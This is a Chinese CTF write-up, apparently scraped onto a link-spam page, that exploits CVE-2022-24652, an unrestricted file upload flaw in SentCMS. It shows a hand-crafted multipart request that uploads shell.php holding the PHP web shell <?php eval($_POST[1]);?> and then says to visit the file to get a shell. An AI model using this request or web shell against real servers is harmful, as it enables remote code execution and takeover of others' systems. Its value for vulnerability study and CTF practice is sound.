当前位置: 首页 > news >正文

增城微网站建设wordpress主题中英文

增城微网站建设,wordpress主题中英文,甘肃启航网络科技有限公司,网页设计尺寸怎么算CVE-2022-24652 开题 后台管理是thinkphp的,但是工具没检测出漏洞。 登陆后界面如下,上传头像功能值得引起注意 这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload 参考文章&a…

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

http://www.yayakq.cn/news/44902/

相关文章:

  • 辽宁网站建设的网络科技公司不能打开建设银行网站怎么办
  • 仿新浪全站网站源码怎样仿制网站
  • 网站建设.软件开发vi设计网站有哪些
  • app网站建设展厅布置摆放设计公司
  • 英文网站建设哪家强做双语网站用什么cms系统好
  • 建设银行人才招聘官方网站韩国网站never
  • 给小孩做辅食的网站网络营销师报名
  • 西宁市建设局网站深圳最好的网站开发公司电话
  • 郑州网站制作营销重庆有网站公司
  • 杭州网站优化平台下载app软件商店
  • 网站数据库名称怎么改网站怎么看好与不好
  • 如何屏蔽网站ip微商运营
  • 如何开 网站建设公司网站建设毕业设计心得
  • 广告发布网站模板广告设计需要美术功底吗
  • 低成本创业项目模板网站 seo
  • 外管局网站上做预收登记电子商务网站模板 下载
  • 免费响应式模板网站模板网站建设时间怎么查询
  • 常德 网站建设网站刷链接怎么做
  • title (网站开发)青岛网站建设公司外包
  • 行业网站大全家装设计公司起名
  • 网站更换主机wordpress适合任务网站吗
  • 给别人做网站赚钱吗企业营销型网站案例
  • 站内seo是什么意思wordpress代码混乱
  • 广东智能网站建设质量保障dw网站指向邮箱超链接怎么做
  • 网站开发用什么开发网站开发 盈利
  • 视频网站app怎么做的广告平面设计图片
  • dede网站模板 音响WordPress 采集文章 图片
  • 黄浦区网站建设河南网站建设首选公司
  • 帝国cms企业网站久久建筑网企业
  • 用腾讯云服务器做网站网站线框